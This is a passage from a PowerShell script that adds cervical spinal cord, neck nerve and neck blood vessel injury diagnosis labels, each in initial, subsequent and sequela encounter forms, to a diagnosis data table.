lesion at C4 level of cervical spinal cord","Complete lesion at C4 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C4 level of cervical spinal cord","Complete lesion at C4 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C5 level of cervical spinal cord","Complete lesion at C5 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C5 level of cervical spinal cord","Complete lesion at C5 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C5 level of cervical spinal cord","Complete lesion at C5 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C6 level of cervical spinal cord","Complete lesion at C6 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C6 level of cervical spinal cord","Complete lesion at C6 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C6 level of cervical spinal cord","Complete lesion at C6 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C7 level of cervical spinal cord","Complete lesion at C7 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C7 level of cervical spinal cord","Complete lesion at C7 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C7 level of cervical spinal cord","Complete lesion at C7 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at C8 level of cervical spinal cord","Complete lesion at C8 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C8 level of cervical spinal cord","Complete lesion at C8 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at C8 level of cervical spinal cord","Complete lesion at C8 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at unspecified level of cervical spinal cord","Complete lesion at unspecified level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at unspecified level of cervical spinal cord","Complete lesion at unspecified level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at unspecified level of cervical spinal cord","Complete lesion at unspecified level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C1 level of cervical spinal cord","Central cord syndrome at C1 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C1 level of cervical spinal cord","Central cord syndrome at C1 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C1 level of cervical spinal cord","Central cord syndrome at C1 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C2 level of cervical spinal cord","Central cord syndrome at C2 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C2 level of cervical spinal cord","Central cord syndrome at C2 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C2 level of cervical spinal cord","Central cord syndrome at C2 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C3 level of cervical spinal cord","Central cord syndrome at C3 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C3 level of cervical spinal cord","Central cord syndrome at C3 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C3 level of cervical spinal cord","Central cord syndrome at C3 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C4 level of cervical spinal cord","Central cord syndrome at C4 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C4 level of cervical spinal cord","Central cord syndrome at C4 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C4 level of cervical spinal cord","Central cord syndrome at C4 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C5 level of cervical spinal cord","Central cord syndrome at C5 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C5 level of cervical spinal cord","Central cord syndrome at C5 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C5 level of cervical spinal cord","Central cord syndrome at C5 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C6 level of cervical spinal cord","Central cord syndrome at C6 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C6 level of cervical spinal cord","Central cord syndrome at C6 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C6 level of cervical spinal cord","Central cord syndrome at C6 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C7 level of cervical spinal cord","Central cord syndrome at C7 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C7 level of cervical spinal cord","Central cord syndrome at C7 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C7 level of cervical spinal cord","Central cord syndrome at C7 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C8 level of cervical spinal cord","Central cord syndrome at C8 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C8 level of cervical spinal cord","Central cord syndrome at C8 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at C8 level of cervical spinal cord","Central cord syndrome at C8 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at unspecified level of cervical spinal cord","Central cord syndrome at unspecified level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at unspecified level of cervical spinal cord","Central cord syndrome at unspecified level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central cord syndrome at unspecified level of cervical spinal cord","Central cord syndrome at unspecified level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C1 level of cervical spinal cord","Anterior cord syndrome at C1 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C1 level of cervical spinal cord","Anterior cord syndrome at C1 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C1 level of cervical spinal cord","Anterior cord syndrome at C1 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C2 level of cervical spinal cord","Anterior cord syndrome at C2 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C2 level of cervical spinal cord","Anterior cord syndrome at C2 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C2 level of cervical spinal cord","Anterior cord syndrome at C2 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C3 level of cervical spinal cord","Anterior cord syndrome at C3 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C3 level of cervical spinal cord","Anterior cord syndrome at C3 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C3 level of cervical spinal cord","Anterior cord syndrome at C3 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C4 level of cervical spinal cord","Anterior cord syndrome at C4 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C4 level of cervical spinal cord","Anterior cord syndrome at C4 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C4 level of cervical spinal cord","Anterior cord syndrome at C4 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C5 level of cervical spinal cord","Anterior cord syndrome at C5 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C5 level of cervical spinal cord","Anterior cord syndrome at C5 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C5 level of cervical spinal cord","Anterior cord syndrome at C5 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C6 level of cervical spinal cord","Anterior cord syndrome at C6 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C6 level of cervical spinal cord","Anterior cord syndrome at C6 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C6 level of cervical spinal cord","Anterior cord syndrome at C6 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C7 level of cervical spinal cord","Anterior cord syndrome at C7 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C7 level of cervical spinal cord","Anterior cord syndrome at C7 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C7 level of cervical spinal cord","Anterior cord syndrome at C7 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C8 level of cervical spinal cord","Anterior cord syndrome at C8 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C8 level of cervical spinal cord","Anterior cord syndrome at C8 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at C8 level of cervical spinal cord","Anterior cord syndrome at C8 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at unspecified level of cervical spinal cord","Anterior cord syndrome at unspecified level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at unspecified level of cervical spinal cord","Anterior cord syndrome at unspecified level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at unspecified level of cervical spinal cord","Anterior cord syndrome at unspecified level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C1 level of cervical spinal cord","Brown-Sequard syndrome at C1 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C1 level of cervical spinal cord","Brown-Sequard syndrome at C1 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C1 level of cervical spinal cord","Brown-Sequard syndrome at C1 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C2 level of cervical spinal cord","Brown-Sequard syndrome at C2 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C2 level of cervical spinal cord","Brown-Sequard syndrome at C2 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C2 level of cervical spinal cord","Brown-Sequard syndrome at C2 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C3 level of cervical spinal cord","Brown-Sequard syndrome at C3 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C3 level of cervical spinal cord","Brown-Sequard syndrome at C3 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C3 level of cervical spinal cord","Brown-Sequard syndrome at C3 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C4 level of cervical spinal cord","Brown-Sequard syndrome at C4 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C4 level of cervical spinal cord","Brown-Sequard syndrome at C4 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C4 level of cervical spinal cord","Brown-Sequard syndrome at C4 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C5 level of cervical spinal cord","Brown-Sequard syndrome at C5 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C5 level of cervical spinal cord","Brown-Sequard syndrome at C5 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C5 level of cervical spinal cord","Brown-Sequard syndrome at C5 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C6 level of cervical spinal cord","Brown-Sequard syndrome at C6 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C6 level of cervical spinal cord","Brown-Sequard syndrome at C6 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C6 level of cervical spinal cord","Brown-Sequard syndrome at C6 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C7 level of cervical spinal cord","Brown-Sequard syndrome at C7 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C7 level of cervical spinal cord","Brown-Sequard syndrome at C7 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C7 level of cervical spinal cord","Brown-Sequard syndrome at C7 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C8 level of cervical spinal cord","Brown-Sequard syndrome at C8 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C8 level of cervical spinal cord","Brown-Sequard syndrome at C8 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at C8 level of cervical spinal cord","Brown-Sequard syndrome at C8 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at unspecified level of cervical spinal cord","Brown-Sequard syndrome at unspecified level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at unspecified level of cervical spinal cord","Brown-Sequard syndrome at unspecified level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at unspecified level of cervical spinal cord","Brown-Sequard syndrome at unspecified level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C1 level of cervical spinal cord","Other incomplete lesion at C1 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C1 level of cervical spinal cord","Other incomplete lesion at C1 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C1 level of cervical spinal cord","Other incomplete lesion at C1 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C2 level of cervical spinal cord","Other incomplete lesion at C2 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C2 level of cervical spinal cord","Other incomplete lesion at C2 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C2 level of cervical spinal cord","Other incomplete lesion at C2 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C3 level of cervical spinal cord","Other incomplete lesion at C3 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C3 level of cervical spinal cord","Other incomplete lesion at C3 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C3 level of cervical spinal cord","Other incomplete lesion at C3 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C4 level of cervical spinal cord","Other incomplete lesion at C4 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C4 level of cervical spinal cord","Other incomplete lesion at C4 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C4 level of cervical spinal cord","Other incomplete lesion at C4 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C5 level of cervical spinal cord","Other incomplete lesion at C5 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C5 level of cervical spinal cord","Other incomplete lesion at C5 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C5 level of cervical spinal cord","Other incomplete lesion at C5 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C6 level of cervical spinal cord","Other incomplete lesion at C6 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C6 level of cervical spinal cord","Other incomplete lesion at C6 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C6 level of cervical spinal cord","Other incomplete lesion at C6 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C7 level of cervical spinal cord","Other incomplete lesion at C7 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C7 level of cervical spinal cord","Other incomplete lesion at C7 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C7 level of cervical spinal cord","Other incomplete lesion at C7 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C8 level of cervical spinal cord","Other incomplete lesion at C8 level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C8 level of cervical spinal cord","Other incomplete lesion at C8 level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at C8 level of cervical spinal cord","Other incomplete lesion at C8 level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at unspecified level of cervical spinal cord","Other incomplete lesion at unspecified level of cervical spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at unspecified level of cervical spinal cord","Other incomplete lesion at unspecified level of cervical spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at unspecified level of cervical spinal cord","Other incomplete lesion at unspecified level of cervical spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of cervical spine","Injury of nerve root of cervical spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of cervical spine","Injury of nerve root of cervical spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of cervical spine","Injury of nerve root of cervical spine, sequela") + $null = $DiagnosisList.Rows.Add("Injury of brachial plexus","Injury of brachial plexus, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of brachial plexus","Injury of brachial plexus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of brachial plexus","Injury of brachial plexus, sequela") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerves of neck","Injury of peripheral nerves of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerves of neck","Injury of peripheral nerves of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerves of neck","Injury of peripheral nerves of neck, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cervical sympathetic nerves","Injury of cervical sympathetic nerves, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cervical sympathetic nerves","Injury of cervical sympathetic nerves, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cervical sympathetic nerves","Injury of cervical sympathetic nerves, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other specified nerves of neck","Injury of other specified nerves of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other specified nerves of neck","Injury of other specified nerves of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other specified nerves of neck","Injury of other specified nerves of neck, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerves of neck","Injury of unspecified nerves of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerves of neck","Injury of unspecified nerves of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerves of neck","Injury of unspecified nerves of neck, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right carotid artery","Unspecified injury of right carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right carotid artery","Unspecified injury of right carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right carotid artery","Unspecified injury of right carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left carotid artery","Unspecified injury of left carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left carotid artery","Unspecified injury of left carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left carotid artery","Unspecified injury of left carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified carotid artery","Unspecified injury of unspecified carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified carotid artery","Unspecified injury of unspecified carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified carotid artery","Unspecified injury of unspecified carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right carotid artery","Minor laceration of right carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right carotid artery","Minor laceration of right carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right carotid artery","Minor laceration of right carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left carotid artery","Minor laceration of left carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left carotid artery","Minor laceration of left carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left carotid artery","Minor laceration of left carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified carotid artery","Minor laceration of unspecified carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified carotid artery","Minor laceration of unspecified carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified carotid artery","Minor laceration of unspecified carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right carotid artery","Major laceration of right carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right carotid artery","Major laceration of right carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right carotid artery","Major laceration of right carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left carotid artery","Major laceration of left carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left carotid artery","Major laceration of left carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left carotid artery","Major laceration of left carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified carotid artery","Major laceration of unspecified carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified carotid artery","Major laceration of unspecified carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified carotid artery","Major laceration of unspecified carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right carotid artery","Other specified injury of right carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right carotid artery","Other specified injury of right carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right carotid artery","Other specified injury of right carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left carotid artery","Other specified injury of left carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left carotid artery","Other specified injury of left carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left carotid artery","Other specified injury of left carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified carotid artery","Other specified injury of unspecified carotid artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified carotid artery","Other specified injury of unspecified carotid artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified carotid artery","Other specified injury of unspecified carotid artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right vertebral artery","Unspecified injury of right vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right vertebral artery","Unspecified injury of right vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right vertebral artery","Unspecified injury of right vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left vertebral artery","Unspecified injury of left vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left vertebral artery","Unspecified injury of left vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left vertebral artery","Unspecified injury of left vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified vertebral artery","Unspecified injury of unspecified vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified vertebral artery","Unspecified injury of unspecified vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified vertebral artery","Unspecified injury of unspecified vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right vertebral artery","Minor laceration of right vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right vertebral artery","Minor laceration of right vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right vertebral artery","Minor laceration of right vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left vertebral artery","Minor laceration of left vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left vertebral artery","Minor laceration of left vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left vertebral artery","Minor laceration of left vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified vertebral artery","Minor laceration of unspecified vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified vertebral artery","Minor laceration of unspecified vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified vertebral artery","Minor laceration of unspecified vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right vertebral artery","Major laceration of right vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right vertebral artery","Major laceration of right vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right vertebral artery","Major laceration of right vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left vertebral artery","Major laceration of left vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left vertebral artery","Major laceration of left vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left vertebral artery","Major laceration of left vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified vertebral artery","Major laceration of unspecified vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified vertebral artery","Major laceration of unspecified vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified vertebral artery","Major laceration of unspecified vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right vertebral artery","Other specified injury of right vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right vertebral artery","Other specified injury of right vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right vertebral artery","Other specified injury of right vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left vertebral artery","Other specified injury of left vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left vertebral artery","Other specified injury of left vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left vertebral artery","Other specified injury of left vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified vertebral artery","Other specified injury of unspecified vertebral artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified vertebral artery","Other specified injury of unspecified vertebral artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified vertebral artery","Other specified injury of unspecified vertebral artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right external jugular vein","Unspecified injury of right external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right external jugular vein","Unspecified injury of right external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right external jugular vein","Unspecified injury of right external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left external jugular vein","Unspecified injury of left external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left external jugular vein","Unspecified injury of left external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left external jugular vein","Unspecified injury of left external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified external jugular vein","Unspecified injury of unspecified external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified external jugular vein","Unspecified injury of unspecified external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified external jugular vein","Unspecified injury of unspecified external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right external jugular vein","Minor laceration of right external jugular vein, initial 